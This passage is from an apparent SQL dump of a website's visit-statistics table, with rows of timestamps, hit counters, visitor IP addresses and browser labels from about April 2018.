0,'66.249.69.39',''),(227580,1522532056,1,1,0,0,'52.86.124.62','other'),(227581,1522532663,1,1,0,0,'213.180.203.8','other'),(227582,1522532966,1,1,0,0,'52.86.124.62','other'),(227583,1522533870,1,1,0,0,'52.86.124.62','other'),(227584,1522534411,2,2,0,0,'216.244.66.237','other'),(227585,1522534440,1,0,1,0,'66.249.69.35',''),(227586,1522534775,1,1,0,0,'52.86.124.62','other'),(227587,1522535110,2,2,0,0,'141.8.142.74','other'),(227588,1522535348,1,0,1,0,'66.249.69.35',''),(227589,1522535687,1,1,0,0,'52.86.124.62','other'),(227590,1522536038,3,3,0,0,'216.244.66.237','other'),(227591,1522536597,1,1,0,0,'52.86.124.62','other'),(227592,1522536792,1,1,0,0,'217.69.133.5','other'),(227593,1522536800,1,1,0,0,'217.69.134.161','other'),(227594,1522537441,1,1,0,0,'178.154.171.88','other'),(227595,1522537512,1,1,0,0,'52.86.124.62','other'),(227596,1522538112,1,1,0,0,'87.250.224.46','other'),(227597,1522538138,1,1,0,0,'37.9.113.182','other'),(227598,1522538413,1,1,0,0,'52.86.124.62','other'),(227599,1522538918,1,1,0,0,'198.37.118.9','firefox'),(227600,1522539064,2,2,0,0,'216.244.66.237','other'),(227601,1522539214,1,1,0,0,'34.229.71.105','other'),(227602,1522539339,1,1,0,0,'52.86.124.62','other'),(227603,1522539353,1,1,0,0,'8.29.198.26','other'),(227604,1522539528,15,15,0,0,'185.189.112.157','other'),(227605,1522539757,1,0,1,0,'66.249.69.35',''),(227606,1522543534,1,1,0,0,'52.86.124.62','other'),(227607,1522549193,2,2,0,0,'52.86.124.62','other'),(227608,1522549969,1,1,0,0,'37.9.113.115','other'),(227609,1522550002,1,1,0,0,'178.154.171.81','other'),(227610,1522550095,1,1,0,0,'52.86.124.62','other'),(227611,1522550135,1,1,0,0,'87.250.224.77','other'),(227612,1522550184,1,1,0,0,'46.188.32.27','msie'),(227613,1522550207,1,1,0,0,'178.154.171.60','other'),(227614,1522550214,1,1,0,0,'8.29.198.26','other'),(227615,1522550241,1,1,0,0,'141.8.142.74','other'),(227616,1522550508,1,1,0,0,'37.9.113.114','other'),(227617,1522550629,1,1,0,0,'87.250.224.96','other'),(227618,1522550679,2,2,0,0,'141.8.142.134','other'),(227619,1522550762,1,1,0,0,'178.154.171.55','other'),(227620,1522550860,1,1,0,0,'37.9.113.151','other'),(227621,1522550998,1,1,0,0,'52.86.124.62','other'),(227622,1522552147,1,1,0,0,'52.86.124.62','other'),(227623,1522552614,3,3,0,0,'216.244.66.237','other'),(227624,1522552823,1,1,0,0,'5.45.207.49','other'),(227625,1522553065,1,1,0,0,'52.86.124.62','other'),(227626,1522553535,2,2,0,0,'37.9.113.132','other'),(227627,1522553676,1,1,0,0,'178.154.200.59','other'),(227628,1522553972,1,1,0,0,'52.86.124.62','other'),(227629,1522554533,1,1,0,0,'54.67.59.131','chrome'),(227630,1522554596,17,17,0,0,'213.133.111.165','other'),(227631,1522554876,1,1,0,0,'52.86.124.62','other'),(227632,1522555757,1,1,0,0,'141.8.132.22','other'),(227633,1522555778,1,1,0,0,'52.86.124.62','other'),(227634,1522555863,1,0,1,0,'66.249.69.35',''),(227635,1522556193,1,1,0,0,'37.9.113.132','other'),(227636,1522556553,1,1,0,0,'178.154.200.73','other'),(227637,1522556697,1,1,0,0,'52.86.124.62','other'),(227638,1522557598,1,1,0,0,'52.86.124.62','other'),(227639,1522558499,1,1,0,0,'52.86.124.62','other'),(227640,1522559419,1,1,0,0,'52.86.124.62','other'),(227641,1522559530,1,1,0,0,'87.250.224.46','other'),(227642,1522559539,1,1,0,0,'157.55.39.220','other'),(227643,1522559970,1,1,0,0,'5.45.207.58','other'),(227644,1522560329,1,1,0,0,'52.86.124.62','other'),(227645,1522560398,1,0,1,0,'66.249.69.39',''),(227646,1522560970,1,1,0,0,'91.196.178.131','other'),(227647,1522561045,1,1,0,0,'216.244.66.237','other'),(227648,1522561065,1,1,0,0,'8.29.198.25','other'),(227649,1522561230,1,1,0,0,'52.86.124.62','other'),(227650,1522561244,1,1,0,0,'178.154.171.60','other'),(227651,1522561573,1,1,0,0,'37.9.113.100','other'),(227652,1522562131,1,1,0,0,'52.86.124.62','other'),(227653,1522562697,1,1,0,0,'216.244.66.237','other'),(227654,1522562706,1,1,0,0,'141.8.142.74','other'),(227655,1522564292,1,1,0,0,'178.154.171.88','other'),(227656,1522564442,1,1,0,0,'54.175.235.74','other'),(227657,1522564445,1,0,1,0,'66.249.69.89',''),(227658,1522564821,2,2,0,0,'216.244.66.194','other'),(227659,1522565358,1,1,0,0,'54.175.235.74','other'),(227660,1522566282,1,1,0,0,'54.175.235.74','other'),(227661,1522566310,1,0,1,0,'66.249.69.41',''),(227662,1522566343,1,0,1,0,'66.249.69.39',''),(227663,1522566609,2,2,0,0,'216.244.66.237','other'),(227664,1522567058,1,1,0,0,'91.209.11.236','other'),(227665,1522567204,1,1,0,0,'54.175.235.74','other'),(227666,1522567225,1,1,0,0,'212.129.3.60','chrome'),(227667,1522568015,1,0,1,0,'66.249.69.35',''),(227668,1522568122,1,1,0,0,'54.175.235.74','other'),(227669,1522569031,1,1,0,0,'54.175.235.74','other'),(227670,1522569163,2,2,0,0,'87.250.224.46','other'),(227671,1522569233,1,1,0,0,'180.76.15.18','other'),(227672,1522569954,1,1,0,0,'54.175.235.74','other'),(227673,1522570193,1,1,0,0,'141.8.142.74','other'),(227674,1522570234,2,2,0,0,'91.209.11.236','other'),(227675,1522570327,2,0,2,0,'66.249.69.35',''),(227676,1522570885,1,1,0,0,'54.175.235.74','other'),(227677,1522571369,1,1,0,0,'180.76.15.144','other'),(227678,1522571417,2,2,0,0,'141.8.142.74','other'),(227679,1522571791,1,1,0,0,'54.175.235.74','other'),(227680,1522571901,1,1,0,0,'8.29.198.26','other'),(227681,1522572382,1,1,0,0,'157.55.39.220','other'),(227682,1522572457,1,1,0,0,'141.8.142.74','other'),(227683,1522572617,1,1,0,0,'91.209.11.236','other'),(227684,1522572715,1,1,0,0,'54.175.235.74','other'),(227685,1522573618,1,1,0,0,'54.175.235.74','other'),(227686,1522573816,1,0,1,0,'66.249.69.35',''),(227687,1522574548,1,1,0,0,'54.175.235.74','other'),(227688,1522575495,1,1,0,0,'54.175.235.74','other'),(227689,1522575752,1,1,0,0,'157.55.39.222','other'),(227690,1522575828,1,1,0,0,'87.250.224.46','other'),(227691,1522575895,2,2,0,0,'216.244.66.194','other'),(227692,1522575944,1,1,0,0,'141.8.142.74','other'),(227693,1522576154,1,0,1,0,'66.249.69.35',''),(227694,1522576415,1,1,0,0,'54.175.235.74','other'),(227695,1522576969,1,1,0,0,'94.178.117.18','chrome'),(227696,1522577278,1,0,1,0,'66.249.69.91',''),(227697,1522577334,1,1,0,0,'54.175.235.74','other'),(227698,1522578008,1,1,0,0,'141.8.142.74','other'),(227699,1522579518,3,3,0,0,'46.4.71.176','other'),(227700,1522579656,1,1,0,0,'178.154.171.88','other'),(227701,1522580108,1,1,0,0,'91.209.11.236','other'),(227702,1522580775,2,0,2,0,'66.249.69.41',''),(227703,1522581764,1,1,0,0,'216.244.66.194','other'),(227704,1522581971,1,1,0,0,'91.209.11.236','other'),(227705,1522582190,1,1,0,0,'178.154.171.88','other'),(227706,1522582418,1,0,1,0,'66.249.69.39',''),(227707,1522582745,1,1,0,0,'8.29.198.27','other'),(227708,1522583124,1,1,0,0,'87.250.224.77','other'),(227709,1522583338,1,1,0,0,'144.76.185.181','other'),(227710,1522583419,1,1,0,0,'141.8.142.74','other'),(227711,1522583782,1,1,0,0,'66.249.69.89','chrome'),(227712,1522583786,1,1,0,0,'66.249.69.35','chrome'),(227713,1522583964,1,1,0,0,'91.209.11.236','other'),(227714,1522584100,2,2,0,0,'216.244.66.237','other'),(227715,1522585031,1,1,0,0,'94.179.208.225','chrome'),(227716,1522585842,1,1,0,0,'216.244.66.237','other'),(227717,1522586992,1,0,1,0,'66.249.69.41',''),(227718,1522587341,1,0,1,0,'66.249.69.91',''),(227719,1522587352,2,2,0,0,'216.244.66.237','other'),(227720,1522587365,2,0,2,0,'66.249.69.35',''),(227721,1522587855,1,1,0,0,'95.135.100.149','chrome'),(227722,1522588273,1,1,0,0,'87.250.224.46','other'),(227723,1522588583,1,0,1,0,'66.249.69.35',''),(227724,1522588807,2,2,0,0,'141.8.142.74','other'),(227725,1522588921,1,0,1,0,'66.249.69.51',''),(227726,1522589409,1,1,0,0,'178.154.171.88','other'),(227727,1522590250,1,0,1,0,'66.249.69.35',''),(227728,1522590457,2,2,0,0,'216.244.66.237','other'),(227729,1522590689,1,1,0,0,'194.50.254.169','chrome'),(227730,1522590744,1,1,0,0,'54.175.235.74','other'),(227731,1522591401,1,1,0,0,'188.230.43.254','other'),(227732,1522591440,3,3,0,0,'216.244.66.237','other'),(227733,1522591472,1,0,1,0,'66.249.69.39',''),(227734,1522591662,1,1,0,0,'54.175.235.74','other'),(227735,1522592470,1,0,1,0,'66.249.69.39',''),(227736,1522592581,1,1,0,0,'54.175.235.74','other'),(227737,1522592876,1,1,0,0,'91.209.11.236','other'),(227738,1522593113,1,1,0,0,'178.154.171.88','other'),(227739,1522593583,1,1,0,0,'8.29.198.26','other'),(227740,1522593789,1,1,0,0,'188.230.43.254','other'),(227741,1522594153,1,1,0,0,'216.244.66.194','other'),(227742,1522594642,1,1,0,0,'91.209.11.236','other'),(227743,1522594830,3,0,3,0,'66.249.69.35',''),(227744,1522595030,1,1,0,0,'141.8.142.74','other'),(227745,1522595171,1,1,0,0,'216.244.66.237','other'),(227746,1522596184,1,1,0,0,'188.230.43.254','other'),(227747,1522596354,2,2,0,0,'91.209.11.236','other'),(227748,1522596526,1,1,0,0,'178.154.171.88','other'),(227749,1522596871,2,2,0,0,'216.244.66.237','other'),(227750,1522597683,1,1,0,0,'157.55.39.220','other'),(227751,1522597911,1,1,0,0,'87.250.224.46','other'),(227752,1522598349,1,1,0,0,'216.244.66.237','other'),(227753,1522598993,1,1,0,0,'91.209.11.236','other'),(227754,1522599812,2,2,0,0,'216.244.66.237','other'),(227755,1522599934,1,1,0,0,'91.209.11.236','other'),(227756,1522600142,2,2,0,0,'178.92.170.128','chrome'),(227757,1522600153,1,1,0,0,'91.196.178.45','chrome'),(227758,1522600289,1,1,0,0,'178.154.171.88','other'),(227759,1522600588,1,1,0,0,'37.55.151.137','chrome'),(227760,1522600835,1,1,0,0,'91.209.11.236','other'),(227761,1522601048,2,2,0,0,'94.23.33.67','chrome'),(227762,1522602076,1,1,0,0,'87.250.224.46','other'),(227763,1522602095,2,2,0,0,'216.244.66.237','other'),(227764,1522602768,1,1,0,0,'37.9.113.182','other'),(227765,1522603302,1,1,0,0,'46.242.127.102','msie'),(227766,1522604084,1,1,0,0,'87.250.224.46','other'),(227767,1522604107,1,1,0,0,'216.244.66.237','other'),(227768,1522604412,1,1,0,0,'91.209.11.236','other'),(227769,1522604429,1,1,0,0,'8.29.198.26','other'),(227770,1522604618,1,1,0,0,'35.226.23.240','other'),(227771,1522604882,1,0,1,0,'66.249.69.89',''),(227772,1522605348,2,2,0,0,'216.244.66.237','other'),(227773,1522606126,1,1,0,0,'91.209.11.236','other'),(227774,1522606295,1,0,1,0,'66.249.69.39',''),(227775,1522606430,2,2,0,0,'91.196.178.70','chrome'),(227776,1522606987,1,1,0,0,'87.250.224.46','other'),(227777,1522607676,1,0,1,0,'66.249.69.35',''),(227778,1522608098,7,7,0,0,'216.244.66.237','other'),(227779,1522608423,1,0,1,0,'66.249.69.91',''),(227780,1522608940,1,1,0,0,'157.55.39.207','other'),(227781,1522609167,1,1,0,0,'163.172.255.139','chrome'),(227782,1522609638,1,1,0,0,'216.244.66.246','other'),(227783,1522609663,2,2,0,0,'141.8.142.74','other'),(227784,1522609838,1,1,0,0,'213.179.252.90','chrome'),(227785,1522610017,1,1,0,0,'54.175.235.74','other'),(227786,1522610019,1,1,0,0,'216.244.66.237','other'),(227787,1522610933,1,1,0,0,'54.175.235.74','other'),(227788,1522611469,2,2,0,0,'141.8.142.74','other'),(227789,1522611775,1,1,0,0,'216.244.66.237','other'),(227790,1522611864,1,1,0,0,'54.175.235.74','other'),(227791,1522612781,1,1,0,0,'54.175.235.74','other'),(227792,1522613177,2,2,0,0,'216.244.66.237','other'),(227793,1522613376,1,1,0,0,'91.209.11.236','other'),(227794,1522613699,2,2,0,0,'54.175.235.74','other'),(227795,1522614280,1,1,0,0,'91.209.11.236','other'),(227796,1522614629,1,1,0,0,'54.175.235.74','other'),(227797,1522614671,1,1,0,0,'46.133.4.85','other'),(227798,1522614793,2,2,0,0,'216.244.66.237','other'),(227799,1522615227,1,0,1,0,'66.249.69.89',''),(227800,1522615269,1,1,0,0,'8.29.198.26','other'),(227801,1522615558,1,1,0,0,'54.175.235.74','other'),(227802,1522615729,1,0,1,0,'66.249.69.39',''),(227803,1522616098,1,1,0,0,'91.209.11.236','other'),(227804,1522616303,1,1,0,0,'72.160.57.62','firefox'),(227805,1522616478,1,1,0,0,'54.175.235.74','other'),(227806,1522617398,1,1,0,0,'54.175.235.74','other'),(227807,1522617567,1,1,0,0,'72.160.16.186','firefox'),(227808,1522617684,1,1,0,0,'91.196.178.102','firefox'),(227809,1522619792,1,0,1,0,'66.249.69.35',''),(227810,1522619881,1,1,0,0,'157.55.39.104','other'),(227811,1522622003,2,2,0,0,'178.154.171.88','other'),(227812,1522622119,1,1,0,0,'40.77.167.111','other'),(227813,1522622351,1,1,0,0,'91.209.11.236','other'),(227814,1522623136,1,1,0,0,'178.154.171.88','other'),(227815,1522623336,2,2,0,0,'91.209.11.236','other'),(227816,1522623356,1,1,0,0,'180.76.15.156','other'),(227817,1522624385,1,0,1,0,'66.249.66.195',''),(227818,1522624534,1,0,1,0,'66.249.66.201',''),(227819,1522625105,1,1,0,0,'91.209.11.236','other'),(227820,1522625221,1,1,0,0,'66.249.66.156','chrome'),(227821,1522625224,2,1,1,0,'66.249.66.195',''),(227822,1522625245,1,0,1,0,'66.249.66.157',''),(227823,1522626107,1,1,0,0,'8.29.198.26','other'),(227824,1522626229,1,1,0,0,'157.55.39.104','other'),(227825,1522626535,2,1,1,0,'66.249.66.201',''),(227826,1522626692,1,0,1,0,'66.249.66.195',''),(227827,1522627163,2,2,0,0,'216.244.66.237','other'),(227828,1522627747,1,1,0,0,'157.55.39.195','other'),(227829,1522627797,1,0,1,0,'66.249.66.195',''),(227830,1522628216,1,0,1,0,'66.249.66.199',''),(227831,1522629775,1,1,0,0,'216.244.66.194','other'),(227832,1522629806,2,2,0,0,'91.209.11.236','other'),(227833,1522629838,1,1,0,0,'109.229.6.254','firefox'),(227834,1522630138,1,1,0,0,'216.244.66.237','other'),(227835,1522633358,1,1,0,0,'141.8.142.74','other'),(227836,1522633994,1,0,1,0,'66.249.66.195',''),(227837,1522634143,1,0,1,0,'66.249.66.199',''),(227838,1522635082,1,0,1,0,'66.249.66.199',''),(227839,1522635832,1,1,0,0,'87.250.224.46','other'),(227840,1522636458,2,1,1,0,'66.249.66.199',''),(227841,1522636480,1,1,0,0,'66.249.66.157','chrome'),(227842,1522636483,1,0,1,0,'66.249.66.156',''),(227843,1522636957,1,1,0,0,'8.29.198.25','other'),(227844,1522637552,1,1,0,0,'141.8.142.74','other'),(227845,1522637714,4,4,0,0,'216.244.66.237','other'),(227846,1522639343,1,1,0,0,'216.244.66.237','other'),(227847,1522641443,1,0,1,0,'66.249.66.195',''),(227848,1522641693,1,1,0,0,'216.244.66.194','other'),(227849,1522642472,1,0,1,0,'66.249.66.195',''),(227850,1522643372,1,1,0,0,'178.154.171.88','other'),(227851,1522643521,1,1,0,0,'216.244.66.246','other'),(227852,1522644369,1,0,1,0,'66.249.66.199',''),(227853,1522644541,4,4,0,0,'136.243.68.226','other'),(227854,1522645272,1,1,0,0,'66.249.66.195','chrome'),(227855,1522645274,1,1,0,0,'66.249.66.156','chrome'),(227856,1522645390,4,4,0,0,'216.244.66.237','other'),(227857,1522645634,1,0,1,0,'66.249.66.199',''),(227858,1522645643,2,2,0,0,'141.8.142.74','other'),(227859,1522645754,2,2,0,0,'37.9.113.182','other'),(227860,1522645840,1,1,0,0,'40.77.167.111','other'),(227861,1522645855,1,1,0,0,'91.196.177.46','chrome'),(227862,1522646327,2,2,0,0,'216.244.66.237','other'),(227863,1522646594,1,1,0,0,'54.165.59.7','other'),(227864,1522646977,1,1,0,0,'91.124.82.78','chrome'),(227865,1522647070,1,0,1,0,'66.249.66.156',''),(227866,1522647326,3,3,0,0,'216.244.66.237','other'),(227867,1522647585,2,2,0,0,'141.8.142.74','other'),(227868,1522647609,1,1,0,0,'66.249.66.201','chrome'),(227869,1522647659,3,3,0,0,'54.165.59.7','other'),(227870,1522647792,1,1,0,0,'8.29.198.26','other'),(227871,1522647941,1,1,0,0,'91.196.179.33','chrome'),(227872,1522648111,1,0,1,0,'66.249.66.199',''),(227873,1522648632,1,1,0,0,'66.249.66.156','chrome'),(227874,1522648762,1,1,0,0,'91.196.177.46','chrome'),(227875,1522648914,4,4,0,0,'216.244.66.237','other'),(227876,1522649056,3,3,0,0,'141.8.142.74','other'),(227877,1522649166,1,0,1,0,'66.249.66.201',''),(227878,1522649328,1,1,0,0,'110.22.129.94','chrome'),(227879,1522649944,1,1,0,0,'157.55.39.220','other'),(227880,1522649963,1,1,0,0,'91.196.177.46','chrome'),(227881,1522650453,1,1,0,0,'141.8.132.19','other'),(227882,1522650473,2,2,0,0,'216.244.66.237','other'),(227883,1522650735,1,1,0,0,'91.196.178.88','firefox'),(227884,1522651011,1,1,0,0,'37.55.56.67','chrome'),(227885,1522651231,1,1,0,0,'66.249.66.156','chrome'),(227886,1522651392,2,2,0,0,'141.8.142.74','other'),(227887,1522652003,3,3,0,0,'216.244.66.237','other'),(227888,1522652253,2,2,0,0,'91.196.178.77','chrome'),(227889,1522652271,1,1,0,0,'91.196.178.163','chrome'),(227890,1522652766,1,1,0,0,'178.154.171.88','other'),(227891,1522652892,1,1,0,0,'217.69.134.154','other'),(227892,1522652946,2,2,0,0,'195.230.119.59','chrome'),(227893,1522653370,1,1,0,0,'66.249.66.201','chrome'),(227894,1522653619,2,2,0,0,'216.244.66.237','other'),(227895,1522654979,1,1,0,0,'195.191.104.86','chrome'),(227896,1522655124,1,1,0,0,'77.222.143.222','msie'),(227897,1522655154,6,6,0,0,'216.244.66.237','other'),(227898,1522655355,1,1,0,0,'54.36.149.37','other'),(227899,1522655363,2,2,0,0,'91.196.178.67','firefox'),(227900,1522655480,2,2,0,0,'80.240.128.221','chrome'),(227901,1522655573,1,1,0,0,'54.36.149.10','other'),(227902,1522655694,1,1,0,0,'54.36.148.99','other'),(227903,1522655731,1,1,0,0,'216.244.66.246','other'),(227904,1522655851,1,1,0,0,'54.36.148.199','other'),(227905,1522656049,1,1,0,0,'54.36.148.66','other'),(227906,1522656183,1,1,0,0,'87.250.224.46','other'),(227907,1522656277,1,1,0,0,'82.207.49.86','chrome'),(227908,1522656343,1,1,0,0,'178.94.173.156','chrome'),(227909,1522656354,1,1,0,0,'54.36.148.160','other'),(227910,1522656616,1,1,0,0,'37.9.113.114','other'),(227911,1522656715,3,3,0,0,'216.244.66.237','other'),(227912,1522656793,1,1,0,0,'54.36.149.82','other'),(227913,1522657076,1,1,0,0,'54.36.148.168','other'),(227914,1522657109,1,0,1,0,'66.249.66.199',''),(227915,1522657146,1,1,0,0,'54.36.148.71','other'),(227916,1522657553,1,0,1,0,'66.249.66.158',''),(227917,1522657651,1,1,0,0,'54.36.148.90','other'),(227918,1522657657,1,1,0,0,'54.36.149.61','other'),(227919,1522657737,1,1,0,0,'91.124.219.142','chrome'),(227920,1522657838,2,2,0,0,'130.180.218.60','chrome'),(227921,1522657910,1,1,0,0,'91.196.178.67','firefox'),(227922,1522657915,1,1,0,0,'66.249.66.157','chrome'),(227923,1522657932,1,1,0,0,'80.240.128.221','chrome'),(227924,1522657942,1,1,0,0,'54.36.149.48','other'),(227925,1522658056,1,1,0,0,'157.55.39.104','other'),(227926,1522658088,1,0,1,0,'66.249.66.199',''),(227927,1522658098,1,1,0,0,'178.154.171.88','other'),(227928,1522658104,1,1,0,0,'54.36.148.238','other'),(227929,1522658325,1,1,0,0,'54.36.149.29','other'),(227930,1522658357,3,3,0,0,'216.244.66.237','other'),(227931,1522658373,1,1,0,0,'54.36.149.71','other'),(227932,1522658518,4,4,0,0,'46.174.163.134','chrome'),(227933,1522658526,1,1,0,0,'54.36.148.31','other'),(227934,1522658527,1,1,0,0,'54.36.149.96','other'),(227935,1522658564,1,0,1,0,'66.249.66.195',''),(227936,1522658622,1,1,0,0,'8.29.198.25','other'),(227937,1522658868,1,1,0,0,'54.36.148.198','other'),(227938,1522658885,1,1,0,0,'54.36.149.77','other'),(227939,1522659018,1,1,0,0,'54.36.149.19','other'),(227940,1522659050,1,1,0,0,'91.124.219.142','chrome'),(227941,1522659084,1,1,0,0,'54.36.148.224','other'),(227942,1522659218,1,1,0,0,'54.36.148.115','other'),(227943,1522659462,1,1,0,0,'54.36.148.116','other'),(227944,1522659518,1,1,0,0,'66.249.66.199','chrome'),(227945,1522659524,1,1,0,0,'37.54.114.62','chrome'),(227946,1522659789,4,4,0,0,'216.244.66.237','other'),(227947,1522659806,1,1,0,0,'54.36.148.149','other'),(227948,1522659859,2,2,0,0,'5.9.60.241','other'),(227949,1522659880,1,1,0,0,'54.36.148.166','other'),(227950,1522659913,1,1,0,0,'54.36.149.76','other'),(227951,1522660132,1,1,0,0,'54.36.149.9','other'),(227952,1522660215,1,1,0,0,'91.196.178.162','chrome'),(227953,1522660404,2,0,2,0,'66.249.66.195',''),(227954,1522660416,1,1,0,0,'194.44.179.190','chrome'),(227955,1522660432,1,1,0,0,'54.36.149.33','other'),(227956,1522660519,1,1,0,0,'141.8.132.19','other'),(227957,1522660647,1,1,0,0,'54.36.148.36','other'),(227958,1522661001,1,1,0,0,'188.255.18.250','msie'),(227959,1522661012,1,1,0,0,'54.36.149.84','other'),(227960,1522661276,1,1,0,0,'54.36.149.58','other'),(227961,1522661365,1,1,0,0,'54.36.149.8','other'),(227962,1522661374,2,2,0,0,'216.244.66.237','other'),(227963,1522661649,1,1,0,0,'54.36.148.196','other'),(227964,1522661694,1,1,0,0,'54.36.149.65','other'),(227965,1522661744,1,1,0,0,'91.196.178.102','chrome'),(227966,1522661746,1,1,0,0,'54.36.148.242','other'),(227967,1522661817,1,0,1,0,'66.249.66.199',''),(227968,1522661865,1,1,0,0,'54.36.148.27','other'),(227969,1522661867,1,0,1,0,'66.249.66.201',''),(227970,1522662003,1,1,0,0,'54.36.148.170','other'),(227971,1522662062,1,1,0,0,'54.36.148.109','other'),(227972,1522662395,1,1,0,0,'54.36.148.66','other'),(227973,1522662404,1,1,0,0,'54.36.148.150','other'),(227974,1522662628,1,1,0,0,'54.36.149.59','other'),(227975,1522662801,1,1,0,0,'54.36.148.185','other'),(227976,1522662828,1,1,0,0,'54.36.149.68','other'),(227977,1522662869,3,3,0,0,'216.244.66.237','other'),(227978,1522663063,1,1,0,0,'54.36.148.129','other'),(227979,1522663166,1,1,0,0,'54.36.149.15','other'),(227980,1522663298,1,1,0,0,'54.36.148.235','other'),(227981,1522663349,2,2,0,0,'130.180.218.60','chrome'),(227982,1522663627,1,1,0,0,'141.8.142.74','other'),(227983,1522663802,1,0,1,0,'66.249.66.201',''),(227984,1522663936,1,1,0,0,'54.36.148.223','other'),(227985,1522663979,1,1,0,0,'94.244.178.251','chrome'),(227986,1522663993,2,2,0,0,'91.196.178.168','chrome'),(227987,1522664066,1,1,0,0,'54.36.148.248','other'),(227988,1522664090,1,1,0,0,'54.36.148.170','other'),(227989,1522664178,1,1,0,0,'66.249.66.158','chrome'),(227990,1522664732,1,1,0,0,'54.36.149.72','other'),(227991,1522664753,1,1,0,0,'54.36.149.26','other'),(227992,1522664783,1,1,0,0,'54.36.148.137','other'),(227993,1522665135,1,1,0,0,'94.244.178.251','chrome'),(227994,1522665141,1,1,0,0,'54.36.149.105','other'),(227995,1522665394,1,0,1,0,'66.249.66.199',''),(227996,1522665608,2,2,0,0,'141.8.142.74','other'),(227997,1522665676,1,1,0,0,'54.36.148.225','other'),(227998,1522665844,2,2,0,0,'216.244.66.237','other'),(227999,1522665880,1,1,0,0,'54.36.148.194','other'),(228000,1522665974,1,1,0,0,'54.36.148.240','other'),(228001,1522666055,1,0,1,0,'66.249.66.195',''),(228002,1522666300,1,1,0,0,'54.36.148.85','other'),(228003,1522666302,1,1,0,0,'54.36.149.80','other'),(228004,1522666374,1,1,0,0,'54.36.148.32','other'),(228005,1522666394,1,1,0,0,'54.36.148.182','other'),(228006,1522666459,1,1,0,0,'216.244.66.246','other'),(228007,1522666477,1,1,0,0,'54.36.149.31','other'),(228008,1522666580,1,1,0,0,'194.44.179.190','chrome'),(228009,1522666649,1,1,0,0,'54.36.149.48','other'),(228010,1522666883,1,1,0,0,'54.36.148.51','other'),(228011,1522667141,1,1,0,0,'54.36.148.138','other'),(228012,1522667268,1,1,0,0,'54.36.148.86','other'),(228013,1522667380,1,1,0,0,'54.36.148.179','other'),(228014,1522667435,1,1,0,0,'216.244.66.237','other'),(228015,1522667610,1,1,0,0,'54.36.148.212','other'),(228016,1522667831,1,0,1,0,'66.249.66.157',''),(228017,1522667954,2,1,1,0,'66.249.66.201',''),(228018,1522667974,1,1,0,0,'141.8.142.74','other'),(228019,1522668040,1,1,0,0,'54.36.148.239','other'),(228020,1522668185,1,1,0,0,'87.250.224.46','other'),(228021,1522668228,1,1,0,0,'178.93.52.201','chrome'),(228022,1522668234,1,1,0,0,'54.36.148.12','other'),(228023,1522668261,2,2,0,0,'130.180.220.163','chrome'),(228024,1522668424,1,1,0,0,'54.36.148.231','other'),(228025,1522668598,1,1,0,0,'54.36.149.31','other'),(228026,1522668622,1,1,0,0,'54.36.148.69','other'),(228027,1522668676,1,1,0,0,'54.36.148.192','other'),(228028,1522668724,1,1,0,0,'54.36.149.30','other'),(228029,1522668897,1,1,0,0,'54.36.149.9','other'),(228030,1522669095,2,2,0,0,'216.244.66.237','other'),(228031,1522669104,1,1,0,0,'54.36.148.167','other'),(228032,1522669110,1,1,0,0,'54.36.149.75','other'),(228033,1522669234,1,1,0,0,'91.209.11.236','other'),(228034,1522669276,1,1,0,0,'54.36.148.21','other'),(228035,1522669327,1,1,0,0,'178.251.107.35','chrome'),(228036,1522669338,1,1,0,0,'54.36.149.52','other'),(228037,1522669386,1,1,0,0,'54.36.148.18','other'),(228038,1522669449,1,1,0,0,'8.29.198.26','other'),(228039,1522669497,1,1,0,0,'54.36.148.205','other'),(228040,1522669832,1,1,0,0,'66.249.66.158','chrome'),(228041,1522670017,1,1,0,0,'54.36.149.45','other'),(228042,1522670029,1,1,0,0,'54.36.149.68','other'),(228043,1522670105,1,1,0,0,'54.36.148.23','other'),(228044,1522670115,1,1,0,0,'54.36.148.249','other'),(228045,1522670131,1,1,0,0,'54.36.148.114','other'),(228046,1522670298,1,1,0,0,'37.9.113.182','other'),(228047,1522670361,2,2,0,0,'91.196.178.86','chrome'),(228048,1522670522,1,1,0,0,'54.36.148.51','other'),(228049,1522670579,1,1,0,0,'40.77.167.111','other'),(228050,1522670657,1,1,0,0,'216.244.66.237','other'),(228051,1522670862,1,1,0,0,'54.36.148.162','other'),(228052,1522671045,2,2,0,0,'91.196.178.83','chrome'),(228053,1522671204,1,0,1,0,'66.249.66.195',''),(228054,1522671301,2,2,0,0,'54.36.149.67','other'),(228055,1522671310,1,1,0,0,'54.36.148.181','other'),(228056,1522671577,1,1,0,0,'178.154.171.88','other'),(228057,1522671837,1,1,0,0,'54.36.148.237','other'),(228058,1522671853,1,0,1,0,'66.249.66.199',''),(228059,1522672040,1,1,0,0,'54.36.148.69','other'),(228060,1522672055,1,1,0,0,'141.8.142.74','other'),(228061,1522672064,1,1,0,0,'54.36.149.59','other'),(228062,1522672162,1,1,0,0,'216.244.66.194','other'),(228063,1522672276,1,1,0,0,'54.36.149.5','other'),(228064,1522672277,1,1,0,0,'54.36.149.63','other'),(228065,1522672422,1,1,0,0,'54.36.148.209','other'),(228066,1522672470,1,1,0,0,'54.36.148.222','other'),(228067,1522672475,1,1,0,0,'54.36.148.100','other'),(228068,1522672574,1,1,0,0,'54.36.148.201','other'),(228069,1522672577,1,0,1,0,'66.249.66.195',''),(228070,1522672607,1,1,0,0,'54.36.149.17','other'),(228071,1522672793,1,1,0,0,'54.36.148.27','other'),(228072,1522672799,1,1,0,0,'91.196.150.144','chrome'),(228073,1522672800,1,1,0,0,'95.132.58.20','firefox'),(228074,1522672868,4,4,0,0,'216.244.66.237','other'),(228075,1522672882,1,1,0,0,'91.196.178.86','chrome'),(228076,1522672977,1,1,0,0,'54.36.149.80','other'),(228077,1522673296,1,1,0,0,'54.36.148.206','other'),(228078,1522673438,1,1,0,0,'54.36.148.224','other'),(228079,1522673683,1,1,0,0,'178.154.171.88','other'),(228080,1522673755,2,2,0,0,'91.196.178.18','chrome'),(228081,1522673776,1,1,0,0,'87.250.224.46','other'),(228082,1522673875,1,1,0,0,'54.36.148.198','other'),(228083,1522673936,1,1,0,0,'54.36.148.129','other'),(228084,1522674005,1,1,0,0,'54.36.149.31','other'),(228085,1522674063,1,1,0,0,'180.76.15.142','other'),(228086,1522674257,1,1,0,0,'54.36.149.29','other'),(228087,1522674332,1,1,0,0,'54.36.148.249','other'),(228088,1522674428,1,1,0,0,'141.8.142.74','other'),(228089,1522674487,1,1,0,0,'54.36.149.15','other'),(228090,1522674522,1,1,0,0,'54.36.148.237','other'),(228091,1522674538,3,3,0,0,'216.244.66.237','other'),(228092,1522674617,1,1,0,0,'54.36.148.230','other'),(228093,1522674623,1,1,0,0,'95.132.2.95','ch